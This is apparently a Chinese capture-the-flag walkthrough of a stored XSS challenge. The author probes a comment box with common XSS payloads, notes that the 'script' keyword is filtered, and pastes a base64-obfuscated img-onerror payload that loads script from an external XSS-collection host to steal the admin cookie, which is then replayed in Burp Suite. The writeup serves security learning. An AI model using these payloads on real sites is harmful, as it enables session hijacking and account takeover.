data:image/s3,"s3://crabby-images/07420/07420b50620f1cf7c7b4a9ff87d25855bc11911e" alt=""
进入靶场
左边是吐槽,右边是登录,先登录试试
admin 123456
data:image/s3,"s3://crabby-images/eac46/eac460599e9140c4ce6e4782cd7eeb5d8f4569f1" alt=""
admiin'# 123456
data:image/s3,"s3://crabby-images/194f6/194f6acd8ca032995e6e4c2678f179777ff789c2" alt=""
admin"# 123456
不玩了,先去回顾下xss
回顾完就很尴尬了,我居然用SQL的知识去做xss的题
重来
data:image/s3,"s3://crabby-images/977c6/977c61bee665d8f97767bdb3e139d9e0104485c3" alt=""
吐槽这里有一个输入框,容易出现存储型xss漏洞
常见的xss payload如下:
<script>alert(1)</script>
"><script>alert(1)</script><"
<img src=# onerror=alert(1)>
<svg onload=alert(1)>
都试试
1,<script>alert(1)</script>
data:image/s3,"s3://crabby-images/0f1a4/0f1a4ce0fb779f9aafb2c474463f4fe01fbc3d72" alt=""
data:image/s3,"s3://crabby-images/bf2a3/bf2a3b551eb52f16da56c75dee652494438f713f" alt=""
访问的时候什么都没有,失败
2,"><script>alert(1)</script><"
data:image/s3,"s3://crabby-images/1e2aa/1e2aa89c563a4d086b55a6c28b4538268406729f" alt=""
data:image/s3,"s3://crabby-images/a3589/a3589b07d641bfff10dbbfea7d4f56cd063b2118" alt=""
根据以上两次尝试,知script被过滤了
3,<img src=# onerror=alert(1)>
data:image/s3,"s3://crabby-images/b00a6/b00a68a528913db908966a126a7667897fd5e770" alt=""
data:image/s3,"s3://crabby-images/2007a/2007ab33af894a7e348ef4f92e65c47321086b81" alt=""
出现弹窗1,注入成功
进入xss测试平台XSS平台-XSS测试网站-仅用于安全免费测试
data:image/s3,"s3://crabby-images/35d4a/35d4a4a40ea625b192789a10350b5a4df54f8555" alt=""
之前没用过,先注册
data:image/s3,"s3://crabby-images/c81dd/c81dd8ea1eafbc6b330d39f8aae03c6ea4749c76" alt=""
登录成功
data:image/s3,"s3://crabby-images/27e6b/27e6b26b42e7137c12318607273fa8c1f67b49b0" alt=""
点击左边的创建项目,随便写一个名称
data:image/s3,"s3://crabby-images/9b8e4/9b8e4fe1eeaee636264da1b5bcf0b94c45d0e92e" alt=""
再点击左边的我的项目,右上角的查看配置代码
data:image/s3,"s3://crabby-images/18f15/18f155dee9717cd8e2646cddaf3d6e719059ae6b" alt=""
复制了这个
<img src=c onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPScvL3hzLnBlLzV6Vyc7'))>
data:image/s3,"s3://crabby-images/f3db6/f3db64e0d816064815190a1e747b564bd0a174cf" alt=""
data:image/s3,"s3://crabby-images/833fc/833fc0e72c9c27364789786b1d74fc736d1b08ca" alt=""
但是我的xss平台项目里一直不显示记录(很崩溃啊,想换其他的xss平台,结果都被禁了)
data:image/s3,"s3://crabby-images/783cd/783cd35e701f6b6deb6ac31c5e6fa9587b209460" alt=""
不过得到记录后便会知道backend/admin.php和管理员cookie
data:image/s3,"s3://crabby-images/94d92/94d92050f5f7ca1faaa716fd590696b59acdf26f" alt=""
出现这个页面是我没改cookie
可是我也不知道cookie呀
改cookie就用BP抓包,发送到重放器,在请求里改
就知道flag了